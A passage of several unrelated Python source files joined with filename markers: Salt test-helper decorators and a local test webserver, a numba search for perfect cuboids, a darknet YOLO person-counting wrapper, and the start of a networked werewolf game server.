)
if on_existing == 'delete':
log.debug(
'Deleting the system user {0!r}'.format(
username
)
)
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
cls.skipTest(
'A user named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(username)
)
log.debug(
'Second time creating system user {0!r}'.format(
username
)
)
create_user = cls.run_function('user.add', [username])
if not create_user:
cls.skipTest(
'A user named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(username)
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system user {0!r} '
'afterwards did.'.format(username)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system user {0!r}'.format(username)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_group(group, on_existing='delete', delete=True):
'''
Create and optionally destroy a system group to be used within a test
case. The system user is crated using the ``group`` salt module.
The decorated testcase function must accept 'group' as an argument.
:param group: The desired group name for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system group {0!r}'.format(group))
create_group = cls.run_function('group.add', [group])
if not create_group:
log.debug('Failed to create system group')
# The group was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system group {0!r}'.format(group)
)
if on_existing == 'delete':
log.debug(
'Deleting the system group {0!r}'.format(group)
)
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
cls.skipTest(
'A group named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(group)
)
log.debug(
'Second time creating system group {0!r}'.format(
group
)
)
create_group = cls.run_function('group.add', [group])
if not create_group:
cls.skipTest(
'A group named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(group)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system group {0!r} '
'afterwards did.'.format(group)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system group {0!r}'.format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group,
on_existing='delete', delete=True):
'''
Create and optionally destroy a system user and group to be used within a
test case. The system user is crated using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system user {0!r}'.format(username))
create_user = cls.run_function('user.add', [username])
log.debug('Creating system group {0!r}'.format(group))
create_group = cls.run_function('group.add', [group])
if not create_user:
log.debug('Failed to create system user')
# The user was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system user {0!r}'.format(
username
)
)
if on_existing == 'delete':
log.debug(
'Deleting the system user {0!r}'.format(
username
)
)
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
cls.skipTest(
'A user named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(username)
)
log.debug(
'Second time creating system user {0!r}'.format(
username
)
)
create_user = cls.run_function('user.add', [username])
if not create_user:
cls.skipTest(
'A user named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(username)
)
if not create_group:
log.debug('Failed to create system group')
# The group was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system group {0!r}'.format(group)
)
if on_existing == 'delete':
log.debug(
'Deleting the system group {0!r}'.format(group)
)
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
cls.skipTest(
'A group named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(group)
)
log.debug(
'Second time creating system group {0!r}'.format(
group
)
)
create_group = cls.run_function('group.add', [group])
if not create_group:
cls.skipTest(
'A group named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(group)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
delete_group = cls.run_function('group.delete', [group])
if not delete_user:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system user {0!r} '
'afterwards did.'.format(username)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system user {0!r}'.format(username)
)
if not delete_group:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system group {0!r} '
'afterwards did.'.format(group)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system group {0!r}'.format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def requires_system_grains(func):
'''
Function decorator which loads and passes the system's grains to the test
case.
'''
@functools.wraps(func)
def decorator(cls):
if not hasattr(cls, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which is '
'necessary to collect the system grains'.format(
cls.__class__.__name__
)
)
return func(cls, grains=cls.run_function('grains.items'))
return decorator
def requires_salt_modules(*names):
'''
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
'''
def decorator(caller):
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if old_setup is not None:
old_setup(self, *args, **kwargs)
if not hasattr(self, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which '
'is necessary to collect the loaded modules'.format(
self.__class__.__name__
)
)
not_found_modules = self.run_function('runtests_helpers.modules_available', names)
if not_found_modules:
if len(not_found_modules) == 1:
self.skipTest('Salt module {0!r} is not available'.format(not_found_modules[0]))
self.skipTest('Salt modules not available: {0!r}'.format(not_found_modules))
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrapper(cls):
if not hasattr(cls, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which is '
'necessary to collect the loaded modules'.format(
cls.__class__.__name__
)
)
for name in names:
if name not in cls.run_function('sys.doc'):
cls.skipTest(
'Salt module {0!r} is not available'.format(name)
)
break
return caller(cls)
return wrapper
return decorator
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop('check_all', False)
message = kwargs.pop('message', None)
if kwargs:
raise RuntimeError(
'The only supported keyword argument is \'check_all\' and '
'\'message\'. Invalid keyword arguments: {0}'.format(
', '.join(kwargs.keys())
)
)
if check_all:
for binary in binaries:
if salt.utils.which(binary) is None:
return skip(
'{0}The {1!r} binary was not found'.format(
message and '{0}. '.format(message) or '',
binary
)
)
elif salt.utils.which_bin(binaries) is None:
return skip(
'{0}None of the following binaries was found: {1}'.format(
message and '{0}. '.format(message) or '',
', '.join(binaries)
)
)
return _id
def skip_if_not_root(func):
if not sys.platform.startswith('win'):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as root to run this test'
else:
import salt.utils.win_functions
current_user = salt.utils.win_functions.get_current_user()
if current_user != 'SYSTEM':
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as an Administrator to run this test'
return func
if sys.platform.startswith('win'):
SIGTERM = signal.CTRL_BREAK_EVENT # pylint: disable=no-member
else:
SIGTERM = signal.SIGTERM
def collect_child_processes(pid):
'''
Try to collect any started child processes of the provided pid
'''
# Let's get the child processes of the started subprocess
try:
parent = psutil.Process(pid)
if hasattr(parent, 'children'):
children = parent.children(recursive=True)
else:
children = []
except psutil.NoSuchProcess:
children = []
return children[::-1] # return a reversed list of the children
def _terminate_process_list(process_list, kill=False, slow_stop=False):
for process in process_list[:][::-1]: # Iterate over a reversed copy of the list
if not psutil.pid_exists(process.pid):
process_list.remove(process)
continue
try:
if not kill and process.status() == psutil.STATUS_ZOMBIE:
# Zombie processes will exit once child processes also exit
continue
try:
cmdline = process.cmdline()
except psutil.AccessDenied:
# OSX is more restrictive about the above information
cmdline = None
if not cmdline:
try:
cmdline = process.as_dict()
except Exception:
cmdline = 'UNKNOWN PROCESS'
if kill:
log.info('Killing process(%s): %s', process.pid, cmdline)
process.kill()
else:
log.info('Terminating process(%s): %s', process.pid, cmdline)
try:
if slow_stop:
# Allow coverage data to be written down to disk
process.send_signal(SIGTERM)
try:
process.wait(2)
except psutil.TimeoutExpired:
if psutil.pid_exists(process.pid):
continue
else:
process.terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not psutil.pid_exists(process.pid):
process_list.remove(process)
except psutil.NoSuchProcess:
process_list.remove(process)
def terminate_process_list(process_list, kill=False, slow_stop=False):
def on_process_terminated(proc):
log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
# Try to terminate processes with the provided kill and slow_stop parameters
log.info('Terminating process list. 1st step. kill: %s, slow stop: %s', kill, slow_stop)
# Cache the cmdline since that will be inaccessible once the process is terminated
for proc in process_list:
try:
cmdline = proc.cmdline()
except (psutil.NoSuchProcess, psutil.AccessDenied):
# OSX is more restrictive about the above information
cmdline = None
if not cmdline:
try:
cmdline = proc
except (psutil.NoSuchProcess, psutil.AccessDenied):
cmdline = '<could not be retrived; dead process: {0}>'.format(proc)
proc._cmdline = cmdline
_terminate_process_list(process_list, kill=kill, slow_stop=slow_stop)
psutil.wait_procs(process_list, timeout=15, callback=on_process_terminated)
if process_list:
# If there's still processes to be terminated, retry and kill them if slow_stop is False
log.info('Terminating process list. 2nd step. kill: %s, slow stop: %s', slow_stop is False, slow_stop)
_terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
psutil.wait_procs(process_list, timeout=10, callback=on_process_terminated)
if process_list:
# If there's still processes to be terminated, just kill them, no slow stopping now
log.info('Terminating process list. 3rd step. kill: True, slow stop: False')
_terminate_process_list(process_list, kill=True, slow_stop=False)
psutil.wait_procs(process_list, timeout=5, callback=on_process_terminated)
if process_list:
# In there's still processes to be terminated, log a warning about it
log.warning('Some processes failed to properly terminate: %s', process_list)
def terminate_process(pid=None, process=None, children=None, kill_children=False, slow_stop=False):
'''
Try to terminate/kill the started processe
'''
children = children or []
process_list = []
def on_process_terminated(proc):
if proc.returncode:
log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
else:
log.info('Process %s terminated', getattr(proc, '_cmdline', proc))
if pid and not process:
try:
process = psutil.Process(pid)
process_list.append(process)
except psutil.NoSuchProcess:
# Process is already gone
process = None
if kill_children:
if process:
if not children:
children = collect_child_processes(process.pid)
else:
# Let's collect children again since there might be new ones
children.extend(collect_child_processes(pid))
if children:
process_list.extend(children)
if process_list:
if process:
log.info('Stopping process %s and respective children: %s', process, children)
else:
log.info('Terminating process list: %s', process_list)
terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
if process and psutil.pid_exists(process.pid):
log.warning('Process left behind which we were unable to kill: %s', process)
def terminate_process_pid(pid, only_children=False):
children = []
process = None
# Let's begin the shutdown routines
try:
process = psutil.Process(pid)
children = collect_child_processes(pid)
except psutil.NoSuchProcess:
log.info('No process with the PID %s was found running', pid)
if only_children:
return terminate_process(children=children, kill_children=True, slow_stop=True)
return terminate_process(pid=pid, process=process, children=children, kill_children=True, slow_stop=True)
def repeat(caller=None, condition=True, times=5):
'''
Repeat a test X amount of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
'''
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith('test_')]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(caller, attrname, repeat(caller=function, condition=condition, times=times))
except Exception as exc:
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
result = None
for attempt in range(1, times+1):
log.info('%s test run %d of %s times', cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
'''
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(tornado.web.RequestHandler):
pass
'''
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get('Authorization')
if auth is None or not auth.startswith('Basic '):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header(
'WWW-Authenticate', 'Basic realm=Restricted')
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = \
base64.b64decode(auth[6:]).split(':', 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
'''
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: Oxygen
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
'''
return prefix + ''.join(
random.choice(string.ascii_uppercase + string.digits)
for x in range(size)
)
class Webserver(object):
'''
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
'''
def __init__(self,
root=None,
port=None,
wait=5,
handler=None):
'''
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
'''
if port is not None and not isinstance(port, six.integer_types):
raise ValueError('port must be an integer')
if root is None:
root = os.path.join(FILES, 'file', 'base')
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError('root must be a string')
self.port = port
self.wait = wait
self.handler = handler \
if handler is not None \
else tornado.web.StaticFileHandler
self.web_root = None
def target(self):
'''
Threading target which stands up the tornado application
'''
self.ioloop = tornado.ioloop.IOLoop()
self.ioloop.make_current()
self.application = tornado.web.Application(
[(r'/(.*)', self.handler, {'path': self.root})])
self.application.listen(self.port)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(('127.0.0.1', self.port)) == 0
def url(self, path):
'''
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
'''
if self.web_root is None:
raise RuntimeError('Webserver instance has not been started')
err_msg = 'invalid path, must be either a relative path or a path ' \
'within {0}'.format(self.root)
try:
relpath = path \
if not os.path.isabs(path) \
else os.path.relpath(path, self.root)
if relpath.startswith('..' + os.sep):
raise ValueError(err_msg)
return '/'.join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
'''
Starts the webserver
'''
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = 'http://127.0.0.1:{0}'.format(self.port)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
'Failed to start tornado webserver on 127.0.0.1:{0} within '
'{1} seconds'.format(self.port, self.wait)
)
def stop(self):
'''
Stops the webserver
'''
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
|
numbafollower.py | from multiprocessing import Process
from numba import jit
import math
import time
import decimal
import os
import random
@jit
def computeit( ):
decimal.getcontext().prec = 200
runsize = 1000
x = 0
y = 0
z = 0
face1 = decimal.Decimal(int(0))
face2 = decimal.Decimal(int(0))
face3 = decimal.Decimal(int(0))
runcount = 0
diagonal = decimal.Decimal(int(0))
eulerfound = 0
perfectfound = 0
totalboxes = 0
while 1 > 0:
Filehandle = open("bricked.txt","r")
Filecontents = Filehandle.readlines()
linenum = random.randint(1, len(Filecontents) - 1)
Linecontents = Filecontents[linenum].split()
xstart = int(Linecontents[1]) - runsize
ystart = int(Linecontents[3]) - runsize
zstart = int(Linecontents[5]) - runsize
x = xstart
y = ystart
z = zstart
if x < 1:
x = 1
if y < 1:
y = 1
if z < 1:
z = 1
z = 0
Filehandle.close()
while x < xstart + runsize + runsize:
x = x + 1
y = ystart
#os.system('cls')
print ("boxes: " + str(totalboxes) + " Euler Bricks found: " + str(eulerfound) + " Perfect Cuboids found: " + str(perfectfound))
print ("X: " + str(x) + " y: " + str(y) + " z: " + str(z))
while y < ystart + runsize + runsize:
y = y + 1
z = zstart
if y < 1:
y = 1
if z < 1:
z = 1
while z < zstart + runsize + runsize:
totalboxes += 1
z += 1
face2 = decimal.Decimal((x * x) + (z * z))
face2 = face2.sqrt()
face3 = decimal.Decimal((y * y) + (z * z))
face3 = face3.sqrt()
if face2 %1 == 0:
file = open('face2.txt', 'a')
file.write('\n')
file.write('x: ' + str(x)+ " z: " + str(z))
file.close()
if face3 %1 == 0:
file = open('face3.txt', 'a')
file.write('\n')
file.write('y: ' + str(y)+ " z: " + str(z))
file.close()
if face2 %1 == 0 and face3 %1 == 0:
file = open('brick.txt', 'a')
file.write('\n')
file.write('x: ' + str(x)+ " y: " + str(y) + " z: " + str(z))
file.close()
eulerfound += 1
diagonal = decimal.Decimal((x * x) + (y * y) + (z * z))
diagonal = diagonal.sqrt()
if diagonal % 1 == 0:
print (diagonal)
perfectfound += 1
file = open('perfectcube.txt', 'a')
file.write('\n')
file.write('x: ' + str(x)+ " y: " + str(y) + " z: " + str(z))
file.close()
if __name__ == '__main__':
p1 = Process(target=computeit, args=())
p1.start()
p2 = Process(target=computeit, args=())
p2.start()
p3 = Process(target=computeit, args=())
p3.start()
p4 = Process(target=computeit, args=())
p4.start()
p5 = Process(target=computeit, args=())
p5.start()
p6 = Process(target=computeit, args=())
p6.start()
p7 = Process(target=computeit, args=())
p7.start()
p8 = Process(target=computeit, args=())
p8.start()
|
countPersons.py | # -*- coding: utf-8 -*-
from ctypes import *
import math
import random
import threading
import time #テスト用あとで削除
import darknet
import main_test
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
#lib = CDLL("/home/pjreddie/documents/darknet/libdarknet.so", RTLD_GLOBAL)
lib = CDLL("/home/team-emb/gra_thesis/darknet/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE]
predict_image.restype = POINTER(c_float)
def classify(net, meta, im):
out = predict_image(net, im)
res = []
for i in range(meta.classes):
res.append((meta.names[i], out[i]))
res = sorted(res, key=lambda x: -x[1])
return res
def detect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
im = load_image(image, 0, 0)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
res.append((meta.names[i], dets[j].prob[i], (b.x, b.y, b.w, b.h)))
res = sorted(res, key=lambda x: -x[1])
free_image(im)
free_detections(dets, num)
return res
#net = load_net("/home/team-emb/gra_thesis/darknet/cfg/yolov3.cfg", "/home/team-emb/gra_thesis/darknet/yolov3.weights", 0)
#meta = load_meta("/home/team-emb/gra_thesis/darknet/cfg/coco.data")
'''
class Yolo():
def __init__(self,darknet.netConfig(),darknet.metaConfig()):
self.net = Net
self.meta = Meta
def count():
img = "/home/team-emb/gra_thesis/cap_img/cam_img.jpg"
r = detect(self.net, self.meta, img)
'''
main_test.stb_mode = True
t3 = threading.Thread(target=main_test.standbySign)
t3.start()
net = load_net("/home/team-emb/gra_thesis/darknet/cfg/yolov3.cfg", "/home/team-emb/gra_thesis/darknet/yolov3.weights", 0)
meta = load_meta("/home/team-emb/gra_thesis/darknet/cfg/coco.data")
main_test.stb_mode = False
t3.join()
def count():
img = "/home/team-emb/gra_thesis/cap_img/cam_img.jpg"
r = detect(net, meta, img)
return len(r)
if __name__ == "__main__":
#net = load_net("cfg/densenet201.cfg", "/home/pjreddie/trained/densenet201.weights", 0)
#im = load_image("data/wolf.jpg", 0, 0)
#meta = load_meta("cfg/imagenet1k.data")
#r = classify(net, meta, im)
#print r[:10]
while True:
num = count(img)
print(num)
|
logic.py | from random import randint, shuffle
import socket
from socket import AF_INET, SOCK_STREAM, AF_INET6
from threading import Thread
from typing import Any, Dict, Tuple
from time import sleep
from .abstraction import *
from ..WP import ChunckedData, _recv, KillableThread
from .util import *
class Game:
"""
# Game - the main class for game logic
class Game implements the communication process and the whole game process. Provides interfaces for customizing a game.
# Attributes
- playerCount : `int`, the number of the players
- allPlayer : `dict`, the number and the identity of all player.
- activePlayer: `dict`, the number and the identity of remaining player.
- Key : `int`, the identification number of each player (or you can say seat number)
- Value : `Any`, the identity of each player, should be a class in `abstraction.py`
- ports : `list`, the ports available for communication with the player
- running : `bool`, the status of the game, can set to `True` when the `identityList` is empty and the length of `activePlayer` equals with `playerCount`
- identityList: `list`, used when allocating the user identity
- listener : `IncomingConnection`, the thread for receiving handshakes
# Methods
- `__init__()`: Initialize a new game class
- `startListening()`: Starts listening for clients
- `activate()`: Set the `running` attribute to `True` to prevent further modification
- `deactivate()`: Set the `running` attribute to `False` to prevent further modification
- `setIdentityList()`: Generate an identity configuration according to the given parameter
- `addPlayer()`: add a player to the game after receiving a packet
- `checkStatus()`: Check whether the stopping criterion is triggered
- Stopping criterion: either werewolves, villagers, skilled villagers are all eliminated
- ``
"""
def __init__(self, playerCount: int, ipv4: str = '', ipv6: str = '', port: int = 21567):
"""
Initializa a new game
# Parameter
- ip: `str`, the IP address of the server
- port: `int`, the port of the server, used for listening to the incoming connection
- playerCount: `int`, the number of players in a game
# Return
A `Game` object
"""
# Attribute initialization
self.playerCount: int = playerCount
self.allPlayer: Dict[int, Any] = {}
self.activePlayer: Dict[int, Any] = {}
# Network parameters
self.port = port
self.ipv4 = ipv4
self.ipv6 = ipv6
self.socketv4 = socket.socket(AF_INET, socket.SOCK_STREAM)
self.socketv4.bind((ipv4, port))
self.socketv4.listen(10)
self.socketv6 = socket.socket(AF_INET6, socket.SOCK_STREAM)
self.socketv6.bind((ipv6, port))
self.socketv6.listen(10)
# Game initialization parameters
self.running: bool = False
self.identityList: List[Any] = []
self.listener4: IncomingConnection = IncomingConnection(
self.socketv4, self)
self.listener6: IncomingConnection = IncomingConnection(
self.socketv6, self)
# Further initialization
if True: # Used for indention
self.listener4.setName("IPV4 incoming connection receiver")
self.listener6.setName("IPV6 incoming connection receiver")
# Game parameters
self.day: int = 0
self.night: int = 0
self.status: int = 0
self.victim: List[int] = []
self.guardedLastNight: int = 0
self.hunterStatus: bool = True
self.kingofwolfStatus: bool = True
self.explode: Optional[int] = None
# Verbose
def startListening(self):
"""
Start listening for clients before the game starts. Must be called when the server is not listening.
The thread would automatically stop when there are enough players.
# Parameter
None
# Return
None
"""
assert (
self.identityList
), "The identity list must be initialized" # The identity list should not be empty
assert self.listener4.is_alive() == False, "There is already an active listener"
assert self.listener6.is_alive() == False, "There is already an active listener"
self.listener4.setDaemon(True)
self.listener6.setDaemon(True)
self.listener4.start()
self.listener6.start()
while self.identityList:
pass
sleep(1)
self.listener4.kill()
self.listener6.kill()
def activate(self):
"""
Activate the game
The game must have enough players and have already allocated the identities.
"""
assert not self.identityList, "Identity not fully allocated"
assert (
len(self.activePlayer) == self.playerCount
), "The number of players is not enough"
assert self.status == 0, "The game is already finished"
assert self.day == 0 and self.night == 0
self.running = True # 激活游戏,不允许新的玩家进入
# Check the number of wolves.
wolves = []
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Wolf):
wolves.append(player)
for wolf in wolves:
for wolf2 in wolves:
if wolf == wolf2:
continue
self.activePlayer[wolf].setPeer(self.activePlayer[wolf2])
def deactivate(self):
self.running = False # 游戏结束
def checkStatus(self) -> int:
"""
Check whether the game should be stopped
# Parameter
None
# Return
An `int` integer, value falls in `-1`, `0` and `1`
- `-1`: The game stops and the werewoles win - either villagers or skilled villagers are eliminated
- `0`: The game continues
- `1`: The game stops and the villagers win - the wolves are eliminated
"""
numVillager, numSkilled, numWolf = 0, 0, 0
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Villager):
numVillager += 1
elif isinstance(self.activePlayer[player], Wolf):
numWolf += 1
else:
numSkilled += 1
if numSkilled > 0 and numVillager > 0 and numWolf > 0:
self.status = 0
return 0
elif numWolf == 0:
self.status = 1
return 1
else:
self.status = -1
return -1
def broadcast(self, srcPlayer: Any, content: str):
"""
Send a packet to all the players except the `srcPlayer` (if not `None`)
# Parameters
- srcPlayer: the player to skip
- content: the content of the announcement
# Return
None
"""
for id in sorted(self.activePlayer.keys()):
player = self.activePlayer[id]
if player is srcPlayer:
continue
player.inform(content)
def announceResult(self, status: bool):
for id in sorted(self.allPlayer.keys()):
player = self.allPlayer[id]
player.informResult(status)
def setIdentityList(self, **kwargs: int):
"""
Initialize the identity configuration.
# Parameter
- Villager : `int`, REQUIRED, the number of villagers
- Wolf : `int`, REQUIRED, the number of wolves
- KingofWerewolf: `int`, optional, the number of kings of werewolves
- WhiteWerewolf : `int`, optional, the number of white werewolves
- Predictor : `int`, optional, the number of predictors
- Witch : `int`, optional, the number of witches
